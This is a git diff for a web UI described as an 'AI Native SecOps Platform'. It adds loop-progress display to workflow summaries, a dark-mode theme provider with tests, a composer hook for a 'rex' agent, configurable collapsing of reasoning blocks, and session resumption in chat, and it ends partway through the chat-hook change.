@@ -13,6 +13,10 @@ describe('buildRunWorkflowHeaderSummary', () => {
         return `步骤：${String(options?.step ?? '')}`;
       case 'chat.tool.workflowNode':
         return `节点：${String(options?.node ?? '')}`;
+      case 'chat.tool.workflowLoopIteration':
+        return '循环';
+      case 'chat.tool.workflowLoopCurrent':
+        return '当前';
       default:
         return key;
     }
@@ -57,6 +61,31 @@ describe('buildRunWorkflowHeaderSummary', () => {
     ).toBe('keyword-search-summary 排队中');
   });
 
+  it('prefers generic loop progress over static node count', () => { // metadata carries both step_index/total_nodes (30/5) and loop_progress (30/500); the summary must show the latter
+    expect(
+      buildRunWorkflowHeaderSummary(
+        'run_workflow',
+        {
+          status: 'running',
+          metadata: {
+            workflow_name: 'batch-process',
+            phase: 'running',
+            current_node_id: 'inspect_item',
+            step_index: 30,
+            total_nodes: 5,
+            loop_progress: {
+              iteration: 30,
+              total_iterations: 500,
+              current_item: 'item-30',
+              current_inner_node_id: 'inspect_item',
+            },
+          },
+        },
+        zhT,
+      ),
+    ).toBe('batch-process 执行中 · 循环 30/500 · 当前: item-30 · 节点：inspect_item');
+  });
+
   it('falls back to concise english labels when no translator is provided', () => {
     expect(
       buildRunWorkflowHeaderSummary(
diff --git a/webui/src/components/common/toolStageSummary.ts b/webui/src/components/common/toolStageSummary.ts
index 1ad53eb2d..689056fbb 100644
--- a/webui/src/components/common/toolStageSummary.ts
+++ b/webui/src/components/common/toolStageSummary.ts
@@ -66,6 +66,7 @@ export function buildRunWorkflowHeaderSummary(
   const currentNodeRaw = metadata.current_node_id;
   const stepIndexRaw = metadata.step_index;
   const totalNodesRaw = metadata.total_nodes;
+  const loopProgress = metadata.loop_progress as Record<string, unknown> | undefined;
 
   const phase = typeof phaseRaw === 'string' && phaseRaw.trim() ? phaseRaw.trim() : 'running';
   const currentNode =
@@ -87,16 +88,44 @@ export function buildRunWorkflowHeaderSummary(
     : resolvePhaseLabel(phase);
 
   let summary = `${workflowName} ${phaseLabel}`;
-  if (stepIndex !== null && stepIndex > 0) {
+  const loopIteration =
+    typeof loopProgress?.iteration === 'number' && Number.isFinite(loopProgress.iteration)
+      ? loopProgress.iteration
+      : null;
+  const loopTotal =
+    typeof loopProgress?.total_iterations === 'number' && Number.isFinite(loopProgress.total_iterations)
+      ? loopProgress.total_iterations
+      : null;
+  const loopItem =
+    typeof loopProgress?.current_item === 'string' && loopProgress.current_item.trim()
+      ? loopProgress.current_item.trim()
+      : '';
+  const loopInnerNode =
+    typeof loopProgress?.current_inner_node_id === 'string' && loopProgress.current_inner_node_id.trim()
+      ? loopProgress.current_inner_node_id.trim()
+      : '';
+
+  if (loopIteration !== null && loopIteration > 0) {
+    const loopLabel = translateOrFallback('chat.tool.workflowLoopIteration', 'Loop', t);
+    const progressLabel = loopTotal !== null && loopTotal > 0
+      ? `${loopIteration}/${loopTotal}`
+      : `${loopIteration}`;
+    summary += ` · ${loopLabel} ${progressLabel}`;
+    if (loopItem) {
+      const currentLabel = translateOrFallback('chat.tool.workflowLoopCurrent', 'Current', t);
+      summary += ` · ${currentLabel}: ${loopItem}`;
+    }
+  } else if (stepIndex !== null && stepIndex > 0) {
     const stepLabel = totalNodes !== null ? `${stepIndex}/${totalNodes}` : `${stepIndex}`;
     summary += ` · ${stepLabel}`;
   }
-  if (currentNode) {
+  const nodeForDisplay = loopInnerNode || currentNode;
+  if (nodeForDisplay) {
     summary += ` · ${translateOrFallback(
       'chat.tool.workflowNode',
-      `node:${currentNode}`,
+      `node:${nodeForDisplay}`,
       t,
-      { node: currentNode },
+      { node: nodeForDisplay },
     )}`;
   }
   return summary;
diff --git a/webui/src/components/common/useRexComposerControls.tsx b/webui/src/components/common/useRexComposerControls.tsx
new file mode 100644
index 000000000..2a8c602d0
--- /dev/null
+++ b/webui/src/components/common/useRexComposerControls.tsx
@@ -0,0 +1,57 @@
+import { useMemo } from 'react';
+import {
+  ChatAgentDisplay,
+  ChatModelPicker,
+  useChatAgentOptions,
+  useChatModelOptions,
+} from './ChatPromptSelectors';
+import { useDefaultModelVision } from '@/hooks/useDefaultModelVision';
+
+const REX_AGENT_NAME = 'rex'; // agent name reported as rexAgentName and shown as the selected agent
+const REX_AGENT_NAMES = [REX_AGENT_NAME]; // module-level array, so the same reference is passed as allowedAgentNames on every render
+/** Builds composer props for the fixed 'rex' agent: mention agents, selected model info, textarea height limits and two toolbar slots. */
+export function useRexComposerControls() {
+  const defaultSupportsVision = useDefaultModelVision();
+  const { agents } = useChatAgentOptions({
+    allowedAgentNames: REX_AGENT_NAMES,
+  });
+  const {
+    groupedOptions,
+    loading,
+    selectedModelOption,
+    selectedPromptModel,
+    setSelectedModelKey,
+  } = useChatModelOptions();
+  // Memoised: the returned object (including both JSX slots) is rebuilt only when a listed dependency changes.
+  return useMemo(() => ({
+    rexAgentName: REX_AGENT_NAME,
+    rexMentionAgents: agents,
+    rexModel: selectedPromptModel,
+    rexSupportsVision: selectedModelOption?.supportsVision ?? defaultSupportsVision,
+    rexContextWindowTokens: selectedModelOption?.contextWindowTokens ?? null,
+    rexComposerTextareaMinHeight: 48,
+    rexComposerTextareaMaxHeight: 120,
+    rexToolbarSlot: (
+      <ChatAgentDisplay
+        agents={agents}
+        selectedAgent={REX_AGENT_NAME}
+      />
+    ),
+    rexCenterToolbarSlot: (
+      <ChatModelPicker
+        groupedOptions={groupedOptions}
+        loading={loading}
+        selectedModelOption={selectedModelOption}
+        onSelectModel={(option) => setSelectedModelKey(option.key)}
+      />
+    ),
+  }), [
+    agents,
+    defaultSupportsVision,
+    groupedOptions,
+    loading,
+    selectedModelOption,
+    selectedPromptModel,
+    setSelectedModelKey,
+  ]);
+}
diff --git a/webui/src/components/layout/AuthLayout.tsx b/webui/src/components/layout/AuthLayout.tsx
index 890edcc9e..56d576beb 100644
--- a/webui/src/components/layout/AuthLayout.tsx
+++ b/webui/src/components/layout/AuthLayout.tsx
@@ -1,6 +1,7 @@
 import type { ReactNode } from 'react';
 import { Globe } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
+import ThemeToggle from '@/components/common/ThemeToggle';
 
 const LANGUAGES = [
   { code: 'en-US', label: 'EN' },
@@ -16,14 +17,14 @@ export default function AuthLayout({ children }: AuthLayoutProps) {
   const currentLang = i18n.language;
 
   return (
-    <div className="min-h-screen bg-gray-50 flex flex-col">
+    <div className="min-h-screen bg-gray-50 flex flex-col dark:bg-[#252c35]">
       <div className="flex justify-end px-4 pt-4">
         <div
-          className="inline-flex items-center gap-1 rounded-full border border-gray-200 bg-white px-2 py-1 shadow-sm"
+          className="inline-flex items-center gap-1 rounded-full border border-gray-200 bg-white px-2 py-1 shadow-sm dark:border-[#4a5563] dark:bg-[#303842]"
           role="group"
           aria-label={t('switchLanguage')}
         >
-          <Globe className="mx-1 h-3.5 w-3.5 text-gray-400" aria-hidden />
+          <Globe className="mx-1 h-3.5 w-3.5 text-gray-400 dark:text-[#9aa7b4]" aria-hidden />
           {LANGUAGES.map(({ code, label }) => (
             <button
               key={code}
@@ -31,13 +32,15 @@ export default function AuthLayout({ children }: AuthLayoutProps) {
               onClick={() => i18n.changeLanguage(code)}
               className={`px-2.5 py-1 text-xs font-medium rounded-full transition-colors ${
                 currentLang === code
-                  ? 'bg-slate-900 text-white'
-                  : 'text-gray-500 hover:bg-gray-100 hover:text-gray-700'
+                  ? 'bg-slate-900 text-white dark:bg-[#46515e] dark:text-white'
+                  : 'text-gray-500 hover:bg-gray-100 hover:text-gray-700 dark:text-[#b8c2cc] dark:hover:bg-[#3a434e] dark:hover:text-white'
               }`}
             >
               {label}
             </button>
           ))}
+          <div className="ml-1 h-5 w-px bg-gray-200 dark:bg-[#4a5563]" />
+          <ThemeToggle />
         </div>
       </div>
       <div className="flex-1 flex items-center justify-center p-6">
diff --git a/webui/src/components/layout/Layout.test.tsx b/webui/src/components/layout/Layout.test.tsx
index 883ac1435..297e8858f 100644
--- a/webui/src/components/layout/Layout.test.tsx
+++ b/webui/src/components/layout/Layout.test.tsx
@@ -195,7 +195,11 @@ function renderHomeWithLayout() {
 
 async function flushEffects() {
   await act(async () => {
-    await vi.advanceTimersByTimeAsync(0);
+    if (vi.isFakeTimers()) { // fake timers are installed: advance them by 0 ms inside act()
+      await vi.advanceTimersByTimeAsync(0);
+      return;
+    }
+    await Promise.resolve(); // real timers: await an already-resolved promise inside act() instead
   });
 }
 
diff --git a/webui/src/components/layout/Layout.tsx b/webui/src/components/layout/Layout.tsx
index 5ffad5b9e..172ab8046 100644
--- a/webui/src/components/layout/Layout.tsx
+++ b/webui/src/components/layout/Layout.tsx
@@ -25,6 +25,7 @@ import {
 import { useState, useEffect, useLayoutEffect, useCallback, useMemo, useRef, lazy, Suspense } from 'react';
 import { useTranslation } from 'react-i18next';
 import LanguageSwitcher from '@/components/common/LanguageSwitcher';
+import ThemeToggle from '@/components/common/ThemeToggle';
 // Modals are only rendered after the user clicks/triggers them; pulling them
 // into the eager Layout chunk costs ~1.7k LOC + i18n keys + lucide icons that
 // the home page never needs. To keep the lazy split effective, we don't
@@ -478,7 +479,7 @@ export default function Layout() {
     : productName;
 
   return (
-    <div className="min-h-screen bg-gray-50">
+    <div className="min-h-screen bg-gray-50 text-gray-900 dark:bg-zinc-950 dark:text-zinc-100">
       {/* Modals render lazily — fallback={null} keeps the chunk download
           invisible to the user (they're already triggering an async UI). */}
       <Suspense fallback={null}>
@@ -509,14 +510,14 @@ export default function Layout() {
 
       {sidebarOpen && (
         <div
-          className="fixed inset-0 bg-gray-600 bg-opacity-75 z-40 lg:hidden"
+          className="fixed inset-0 bg-gray-600 bg-opacity-75 z-40 lg:hidden dark:bg-black dark:bg-opacity-75"
           onClick={() => setSidebarOpen(false)}
         />
       )}
 
       <aside
         className={`
-          fixed inset-y-0 left-0 z-50 bg-zinc-100 border-r border-zinc-200
+          fixed inset-y-0 left-0 z-50 bg-zinc-100 border-r border-zinc-200 dark:bg-zinc-950 dark:border-zinc-800
           transition-all duration-300 ease-in-out
           lg:translate-x-0
           ${sidebarOpen ? 'translate-x-0' : '-translate-x-full'}
@@ -525,20 +526,20 @@ export default function Layout() {
       >
         <div className="flex flex-col h-full overflow-hidden">
           {/* Logo */}
-          <div className={`flex items-center h-16 border-b border-zinc-200 flex-shrink-0 ${collapsed ? 'justify-center px-2' : 'pl-6 pr-4'}`}>
+          <div className={`flex items-center h-16 border-b border-zinc-200 flex-shrink-0 dark:border-zinc-800 ${collapsed ? 'justify-center px-2' : 'pl-6 pr-4'}`}>
             {collapsed ? (
               <div
-                className="w-8 h-8 rounded-lg border border-zinc-200 bg-white flex items-center justify-center flex-shrink-0 shadow-sm"
+                className="w-8 h-8 rounded-lg border border-zinc-200 bg-white flex items-center justify-center flex-shrink-0 shadow-sm dark:border-zinc-800 dark:bg-zinc-900"
                 title={productName}
               >
-                <Sparkles className="w-4 h-4 text-zinc-500" />
+                <Sparkles className="w-4 h-4 text-zinc-500 dark:text-zinc-300" />
               </div>
             ) : (
               <>
-                <span className="flex-1 min-w-0 text-xl font-bold text-zinc-900 whitespace-nowrap">{productName}</span>
+                <span className="flex-1 min-w-0 text-xl font-bold text-zinc-900 whitespace-nowrap dark:text-zinc-50">{productName}</span>
                 <button
                   onClick={() => setSidebarOpen(false)}
-                  className="lg:hidden p-1 text-zinc-400 hover:text-zinc-600 rounded flex-shrink-0"
+                  className="lg:hidden p-1 text-zinc-400 hover:text-zinc-600 rounded flex-shrink-0 dark:hover:text-zinc-100"
                 >
                   <X className="w-5 h-5" />
                 </button>
@@ -551,11 +552,11 @@ export default function Layout() {
             {navigation.map((section) => (
               <div key={section.name} className="mb-6">
                 {!collapsed && section.name && (
-                  <h3 className="px-3 mb-2 text-xs font-semibold text-zinc-400 uppercase tracking-wider whitespace-nowrap">
+                  <h3 className="px-3 mb-2 text-xs font-semibold text-zinc-400 uppercase tracking-wider whitespace-nowrap dark:text-zinc-500">
                     {section.name}
                   </h3>
                 )}
-                {collapsed && <div className="mb-1 border-t border-zinc-200 first:border-none" />}
+                {collapsed && <div className="mb-1 border-t border-zinc-200 first:border-none dark:border-zinc-800" />}
                 <div className="space-y-0.5">
                   {section.items.map((item) => {
                     const isActive = location.pathname === item.href
@@ -570,13 +571,13 @@ export default function Layout() {
                           flex items-center rounded-lg transition-all duration-150
                           ${collapsed ? 'justify-center p-2.5' : 'px-3 py-2 text-sm font-medium'}
                           ${isActive
-                            ? 'bg-white text-zinc-900 shadow-sm'
-                            : 'text-zinc-600 hover:bg-white/60 hover:text-zinc-900'
+                            ? 'bg-white text-zinc-900 shadow-sm dark:bg-zinc-800 dark:text-zinc-50'
+                            : 'text-zinc-600 hover:bg-white/60 hover:text-zinc-900 dark:text-zinc-400 dark:hover:bg-zinc-900 dark:hover:text-zinc-50'
                           }
                         `}
                       >
                         <item.icon
-                          className={`flex-shrink-0 w-5 h-5 ${collapsed ? '' : 'mr-3'} ${isActive ? 'text-zinc-700' : 'text-zinc-400'}`}
+                          className={`flex-shrink-0 w-5 h-5 ${collapsed ? '' : 'mr-3'} ${isActive ? 'text-zinc-700 dark:text-zinc-100' : 'text-zinc-400 dark:text-zinc-500'}`}
                         />
                         {!collapsed && (
                           <span className="truncate">{item.name}</span>
@@ -590,41 +591,44 @@ export default function Layout() {
           </nav>
 
           {/* Bottom: Language switcher + version */}
-          <div className={`border-t border-zinc-200 flex-shrink-0 ${collapsed ? 'p-2 flex flex-col items-center gap-2' : 'p-4'}`}>
-            <LanguageSwitcher collapsed={collapsed} />
+          <div className={`border-t border-zinc-200 flex-shrink-0 dark:border-zinc-800 ${collapsed ? 'p-2 flex flex-col items-center gap-2' : 'p-4'}`}>
+            <div className={`flex ${collapsed ? 'flex-col items-center gap-2' : 'items-center gap-2'}`}>
+              <LanguageSwitcher collapsed={collapsed} />
+              <ThemeToggle collapsed={collapsed} />
+            </div>
             {!collapsed && (
               <>
                 {hasUpdate && canManageUpdates ? (
                   <button
                     onClick={() => setShowUpdate(true)}
-                    className="mt-3 w-full rounded-xl border border-amber-200 bg-gradient-to-r from-amber-50 via-orange-50 to-rose-50 px-3 py-2 text-left shadow-sm transition-all hover:-translate-y-0.5 hover:shadow-md"
+                    className="mt-3 w-full rounded-xl border border-amber-200 bg-gradient-to-r from-amber-50 via-orange-50 to-rose-50 px-3 py-2 text-left shadow-sm transition-all hover:-translate-y-0.5 hover:shadow-md dark:border-amber-500/30 dark:from-amber-950/60 dark:via-orange-950/50 dark:to-rose-950/50"
                   >
                     <div className="flex items-center gap-2 text-sm">
-                      <span className="min-w-0 flex-1 truncate font-semibold text-amber-900">
+                      <span className="min-w-0 flex-1 truncate font-semibold text-amber-900 dark:text-amber-100">
                         {t('newVersion')} {formatUpdateVersion(latestVersion) || ''}
                       </span>
                       <span className="inline-flex flex-shrink-0 items-center rounded-full bg-amber-500 px-2 py-0.5 text-xs font-semibold text-white shadow-sm">
                         {t('updateNow')}
                       </span>
                     </div>
-                    <div className="mt-1 text-xs text-amber-700">
+                    <div className="mt-1 text-xs text-amber-700 dark:text-amber-300">
                       {currentVersionLabel}
                     </div>
-                    <div className="mt-0.5 text-xs font-medium text-amber-900">
+                    <div className="mt-0.5 text-xs font-medium text-amber-900 dark:text-amber-100">
                       AI Native SecOps Platform
                     </div>
                   </button>
                 ) : (
                   <button
                     onClick={() => setShowUpdate(true)}
-                    className="w-full text-left mt-3 group rounded-lg px-1 py-1 hover:bg-white/60 transition-colors"
+                    className="w-full text-left mt-3 group rounded-lg px-1 py-1 hover:bg-white/60 transition-colors dark:hover:bg-zinc-900"
                   >
                     <div className="flex items-center gap-1.5">
-                      <span className="text-xs font-medium text-zinc-500 group-hover:text-zinc-800 transition-colors">
+                      <span className="text-xs font-medium text-zinc-500 group-hover:text-zinc-800 transition-colors dark:text-zinc-400 dark:group-hover:text-zinc-100">
                         {productName} {displayVersion || '...'}
                       </span>
                     </div>
-                    <div className="mt-0.5 text-xs text-zinc-400">AI Native SecOps Platform</div>
+                    <div className="mt-0.5 text-xs text-zinc-400 dark:text-zinc-500">AI Native SecOps Platform</div>
                   </button>
                 )}
               </>
@@ -635,8 +639,8 @@ export default function Layout() {
                 title={hasUpdate && canManageUpdates ? t('hasNewVersion', { version: formatUpdateVersion(latestVersion) || '' }) : t('versionInfo')}
                 className={`relative rounded-xl p-2 transition-colors ${
                   hasUpdate && canManageUpdates
-                    ? 'bg-amber-50 text-amber-600 hover:bg-amber-100'
-                    : 'text-zinc-400 hover:text-zinc-600 hover:bg-white/60'
+                    ? 'bg-amber-50 text-amber-600 hover:bg-amber-100 dark:bg-amber-950/50 dark:text-amber-300 dark:hover:bg-amber-900/60'
+                    : 'text-zinc-400 hover:text-zinc-600 hover:bg-white/60 dark:hover:bg-zinc-900 dark:hover:text-zinc-100'
                 }`}
               >
                 {hasUpdate && canManageUpdates ? <ArrowUpCircle className="w-4 h-4" /> : <Sparkles className="w-4 h-4" />}
@@ -659,6 +663,7 @@ export default function Layout() {
             w-3 h-20 items-center justify-center
             bg-zinc-200 hover:bg-zinc-300 border border-r-0 border-zinc-200 rounded-l-lg
             text-zinc-400 hover:text-zinc-600
+            dark:bg-zinc-900 dark:hover:bg-zinc-800 dark:border-zinc-800 dark:text-zinc-500 dark:hover:text-zinc-100
             transition-all duration-200
           "
           title={collapsed ? t('expandNav') : t('collapseNav')}
@@ -671,7 +676,7 @@ export default function Layout() {
       <div className={`lg:hidden fixed top-0 left-0 z-30 flex items-center h-16 px-4 ${sidebarOpen ? 'hidden' : ''}`}>
         <button
           onClick={() => setSidebarOpen(true)}
-          className="p-2 text-gray-500 hover:text-gray-700 bg-white rounded-lg shadow-sm border border-gray-200"
+          className="p-2 text-gray-500 hover:text-gray-700 bg-white rounded-lg shadow-sm border border-gray-200 dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-300 dark:hover:text-zinc-50"
         >
           <Menu className="w-5 h-5" />
         </button>
@@ -681,7 +686,7 @@ export default function Layout() {
       <div
         className={`flex flex-col h-screen transition-all duration-300 ${collapsed ? 'lg:pl-16' : 'lg:pl-52'}`}
       >
-        <main className="flex-1 overflow-hidden bg-gray-50">
+        <main className="flex-1 overflow-hidden bg-gray-50 dark:bg-zinc-950">
           {isFullScreenPage ? (
             <Outlet />
           ) : (
diff --git a/webui/src/contexts/ThemeContext.test.tsx b/webui/src/contexts/ThemeContext.test.tsx
new file mode 100644
index 000000000..9a6144719
--- /dev/null
+++ b/webui/src/contexts/ThemeContext.test.tsx
@@ -0,0 +1,100 @@
+import React, { useContext } from 'react';
+import { act, render, screen, waitFor } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+import { ThemeContext, ThemeProvider } from './ThemeContext';
+/** Test-only consumer: renders the current theme plus buttons that call toggleTheme and setTheme('dark'). */
+function ThemeProbe() {
+  const { theme, toggleTheme, setTheme } = useContext(ThemeContext);
+
+  return (
+    <div>
+      <span data-testid="theme-value">{theme}</span>
+      <button type="button" onClick={toggleTheme}>
+        toggle
+      </button>
+      <button type="button" onClick={() => setTheme('dark')}>
+        set dark
+      </button>
+    </div>
+  );
+}
+/** Replaces window.matchMedia with a stub whose `(prefers-color-scheme: dark)` query reports `matchesDark`. */
+function mockPreferredScheme(matchesDark: boolean) {
+  // Every other query reports `matches: false`; all listener methods are inert spies.
+  const fakeMatchMedia = vi.fn().mockImplementation((query: string) => ({
+    matches: matchesDark && query === '(prefers-color-scheme: dark)',
+    media: query,
+    onchange: null,
+    addEventListener: vi.fn(),
+    removeEventListener: vi.fn(),
+    addListener: vi.fn(),
+    removeListener: vi.fn(),
+    dispatchEvent: vi.fn(),
+  }));
+  Object.defineProperty(window, 'matchMedia', {
+    configurable: true, writable: true, value: fakeMatchMedia,
+  });
+}
+// ThemeProvider tests: initial theme resolution, the class/color-scheme written to <html>, and persistence under 'flocks_theme'.
+describe('ThemeProvider', () => {
+  beforeEach(() => { // reset storage, the root element's class/style, and stub a light system preference
+    localStorage.clear();
+    document.documentElement.classList.remove('dark');
+    document.documentElement.style.colorScheme = '';
+    mockPreferredScheme(false);
+  });
+
+  it('uses system dark preference when no stored theme exists', async () => {
+    mockPreferredScheme(true);
+
+    render(
+      <ThemeProvider>
+        <ThemeProbe />
+      </ThemeProvider>,
+    );
+
+    expect(screen.getByTestId('theme-value')).toHaveTextContent('dark');
+    expect(document.documentElement).toHaveClass('dark');
+    expect(document.documentElement.style.colorScheme).toBe('dark');
+    await waitFor(() => expect(localStorage.getItem('flocks_theme')).toBe('dark'));
+  });
+
+  it('prefers the stored theme over system preference', async () => {
+    localStorage.setItem('flocks_theme', 'light');
+    mockPreferredScheme(true);
+
+    render(
+      <ThemeProvider>
+        <ThemeProbe />
+      </ThemeProvider>,
+    );
+
+    expect(screen.getByTestId('theme-value')).toHaveTextContent('light');
+    expect(document.documentElement).not.toHaveClass('dark');
+    expect(document.documentElement.style.colorScheme).toBe('light');
+    await waitFor(() => expect(localStorage.getItem('flocks_theme')).toBe('light'));
+  });
+
+  it('toggles and persists the dark class on the document root', async () => {
+    const user = userEvent.setup();
+
+    render(
+      <ThemeProvider>
+        <ThemeProbe />
+      </ThemeProvider>,
+    );
+
+    expect(screen.getByTestId('theme-value')).toHaveTextContent('light');
+    expect(document.documentElement).not.toHaveClass('dark');
+
+    await act(async () => {
+      await user.click(screen.getByRole('button', { name: 'toggle' }));
+    });
+
+    expect(screen.getByTestId('theme-value')).toHaveTextContent('dark');
+    expect(document.documentElement).toHaveClass('dark');
+    expect(document.documentElement.style.colorScheme).toBe('dark');
+    await waitFor(() => expect(localStorage.getItem('flocks_theme')).toBe('dark'));
+  });
+});
diff --git a/webui/src/contexts/ThemeContext.tsx b/webui/src/contexts/ThemeContext.tsx
new file mode 100644
index 000000000..8968f28ad
--- /dev/null
+++ b/webui/src/contexts/ThemeContext.tsx
@@ -0,0 +1,63 @@
+import { createContext, useCallback, useEffect, useLayoutEffect, useMemo, useState, type ReactNode } from 'react';
+/** The two supported colour themes. */
+type Theme = 'light' | 'dark';
+/** Shape of the value exposed through ThemeContext. */
+interface ThemeContextValue {
+  theme: Theme; // currently active theme
+  toggleTheme: () => void; // switches between 'light' and 'dark'
+  setTheme: (theme: Theme) => void; // selects a specific theme
+}
+/** localStorage key under which the active theme is stored. */
+const THEME_STORAGE_KEY = 'flocks_theme';
+/** Theme context; the default value (light theme, no-op setters) is what consumers get without a ThemeProvider above them. */
+const ThemeContext = createContext<ThemeContextValue>({
+  theme: 'light',
+  toggleTheme: () => undefined,
+  setTheme: () => undefined,
+});
+/** Initial theme: a valid stored choice first, then the OS colour-scheme preference, else 'light'. Never throws on storage errors. */
+function getInitialTheme(): Theme {
+  if (typeof window === 'undefined') return 'light';
+  try {
+    // Merely reading `window.localStorage` can throw (SecurityError) when site storage is blocked.
+    const stored = window.localStorage?.getItem?.(THEME_STORAGE_KEY) ?? null;
+    if (stored === 'light' || stored === 'dark') return stored;
+  } catch { /* storage unavailable: fall through to the system preference instead of crashing */ }
+
+  if (typeof window.matchMedia !== 'function') return 'light';
+  return window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light';
+}
+/** Reflects the theme on <html>: toggles the `dark` class and sets the inline `color-scheme` style. */
+function applyTheme(theme: Theme) {
+  const { classList, style } = document.documentElement;
+  classList.toggle('dark', theme === 'dark');
+  style.colorScheme = theme;
+}
+/** Holds the active theme, mirrors it onto <html>, persists it to localStorage (best-effort) and exposes it via ThemeContext. */
+export function ThemeProvider({ children }: { children: ReactNode }) {
+  const [theme, setThemeState] = useState<Theme>(getInitialTheme);
+
+  // Layout effect so the root element is updated before the browser paints the new state.
+  useLayoutEffect(() => {
+    applyTheme(theme);
+  }, [theme]);
+
+  // Persistence is best-effort: localStorage access can throw (blocked storage, exceeded quota).
+  useEffect(() => {
+    try {
+      window.localStorage?.setItem?.(THEME_STORAGE_KEY, theme);
+    } catch { /* keep the in-memory theme; it simply will not survive a reload */ }
+  }, [theme]);
+
+  const setTheme = useCallback((nextTheme: Theme) => {
+    setThemeState(nextTheme);
+  }, []);
+  const toggleTheme = useCallback(() => {
+    setThemeState((current) => (current === 'dark' ? 'light' : 'dark'));
+  }, []);
+
+  const value = useMemo(() => ({ theme, toggleTheme, setTheme }), [setTheme, theme, toggleTheme]);
+  return <ThemeContext.Provider value={value}>{children}</ThemeContext.Provider>;
+}
+
+export { ThemeContext };
diff --git a/webui/src/hooks/useReasoningToggle.test.tsx b/webui/src/hooks/useReasoningToggle.test.tsx
new file mode 100644
index 000000000..42c7a13ef
--- /dev/null
+++ b/webui/src/hooks/useReasoningToggle.test.tsx
@@ -0,0 +1,45 @@
+import { act, renderHook } from '@testing-library/react';
+import { describe, expect, it } from 'vitest';
+
+import { useReasoningToggle } from './useReasoningToggle';
+
+describe('useReasoningToggle', () => {
+  it('keeps active reasoning expanded by default for normal chat', () => {
+    const { result } = renderHook(() => useReasoningToggle([
+      { id: 'reason-1', type: 'reasoning', text: 'thinking' },
+    ]));
+
+    expect(result.current.getPartExpanded('reason-1')).toBe(true);
+  });
+
+  it('can default-collapse active reasoning for embedded workflow panels and expand on click', () => {
+    const { result } = renderHook(() => useReasoningToggle(
+      [{ id: 'reason-1', type: 'reasoning', text: 'thinking' }],
+      undefined,
+      { expandWhileActive: false },
+    ));
+
+    expect(result.current.getPartExpanded('reason-1')).toBe(false);
+
+    act(() => {
+      result.current.togglePart('reason-1');
+    });
+
+    expect(result.current.getPartExpanded('reason-1')).toBe(true);
+  });
+
+  it('keeps completed reasoning collapsed by default but expandable', () => {
+    const { result } = renderHook(() => useReasoningToggle([
+      { id: 'reason-1', type: 'reasoning', text: 'thinking' },
+      { id: 'text-1', type: 'text', text: 'answer' },
+    ]));
+
+    expect(result.current.getPartExpanded('reason-1')).toBe(false);
+
+    act(() => {
+      result.current.togglePart('reason-1');
+    });
+
+    expect(result.current.getPartExpanded('reason-1')).toBe(true);
+  });
+});
diff --git a/webui/src/hooks/useReasoningToggle.ts b/webui/src/hooks/useReasoningToggle.ts
index 21e24ab34..b01b48f6e 100644
--- a/webui/src/hooks/useReasoningToggle.ts
+++ b/webui/src/hooks/useReasoningToggle.ts
@@ -11,10 +11,20 @@ import { useState, useMemo } from 'react';
  * - Once reasoning is done (text or tool part exists, or message finished) → collapsed by default
  * - User can manually toggle (collapse/expand) each reasoning block independently
  */
+interface ReasoningToggleOptions {
+  /** Expand active reasoning before the assistant has produced text/tool output. */
+  expandWhileActive?: boolean;
+  /** Default expanded state after reasoning is complete. */
+  defaultExpanded?: boolean;
+}
+
 export function useReasoningToggle(
   parts: any[],
   messageFinish?: any,
+  options: ReasoningToggleOptions = {},
 ) {
+  const expandWhileActive = options.expandWhileActive ?? true;
+  const defaultExpanded = options.defaultExpanded ?? false;
   // Check if a text part already exists → reasoning is done
   const hasTextPart = useMemo(
     () => parts.some((p: any) => p.type === 'text' && p.text),
@@ -40,23 +50,21 @@ export function useReasoningToggle(
   /**
    * Get the display state for a specific reasoning part.
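-   * - reasoning in progress → expanded (true)
+   * - reasoning in progress → expanded by default (`expandWhileActive`), user can collapse manually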
-   * - reasoning done → expanded by default, user can collapse manually
+   * - reasoning done → collapsed by default, user can expand manually
    */
   const getPartExpanded = (partKey: string): boolean => {
-    if (!isReasoningDone) return true;
+    const fallback = isReasoningDone ? defaultExpanded : expandWhileActive;
-    // 思考结束后默认折叠，用户可手动展开
+    // A manual toggle wins; otherwise fall back to the state-dependent default.
-    return expandedByKey[partKey] ?? false;
+    return expandedByKey[partKey] ?? fallback;
   };
 
   /**
    * Toggle a specific reasoning part's expanded state.
-   * Only works after reasoning is done.
    */
   const togglePart = (partKey: string) => {
-    if (!isReasoningDone) return;
     setExpandedByKey((prev) => ({
       ...prev,
-      [partKey]: !(prev[partKey] ?? true),
+      [partKey]: !(prev[partKey] ?? (isReasoningDone ? defaultExpanded : expandWhileActive)),
     }));
   };
 
diff --git a/webui/src/hooks/useSessionChat.test.ts b/webui/src/hooks/useSessionChat.test.ts
index 674e18991..74a4698e9 100644
--- a/webui/src/hooks/useSessionChat.test.ts
+++ b/webui/src/hooks/useSessionChat.test.ts
@@ -120,4 +120,22 @@ describe('useSessionChat.createAndSend — image forwarding', () => {
     );
     expect(promptCall![1]).toMatchObject({ agent: 'my-agent' });
   });
+
+  it('resumes from an initial session id without creating another session', async () => {
+    const { result } = renderHook(() =>
+      useSessionChat({ title: 'Test', autoCreate: false, initialSessionId: 'existing-session' }),
+    );
+
+    expect(result.current.sessionId).toBe('existing-session');
+
+    await act(async () => {
+      await result.current.createAndSend({ text: 'continue' });
+    });
+
+    expect(mockPost.mock.calls.some(([url]) => url === '/api/session')).toBe(false);
+    expect(mockPost).toHaveBeenCalledWith(
+      '/api/session/existing-session/prompt_async',
+      { parts: [{ type: 'text', text: 'continue' }] },
+    );
+  });
 });
diff --git a/webui/src/hooks/useSessionChat.ts b/webui/src/hooks/useSessionChat.ts
index f5e005fca..f936d6cc2 100644
--- a/webui/src/hooks/useSessionChat.ts
+++ b/webui/src/hooks/useSessionChat.ts
@@ -9,6 +9,8 @@ export interface UseSessionChatOptions {
   contextMessage?: string;
   /** Mock welcome message from assistant */
   welcomeMessage?: string;
+  /** Existing session to resume instead of creating a new one */
+  initialSessionId?: string | null;
   /** Auto-create session when hook mounts */
   autoCreate?: boolean;
 }
@@ -18,6 +20,8 @@ export interface CreateAndSendOptions {
   text: string;
   imageParts?: ImagePartData[];
   agent?: string;
+  model?: { providerID: string; modelID: string } | null;
+  displayText?: string;
 }
 
 export function useSessionChat({
@@ -25,13 +29,14 @@ export function useSessionChat({
   category,
   contextMessage,
   welcomeMessage,
+  initialSessionId = null,
   autoCreate = false,
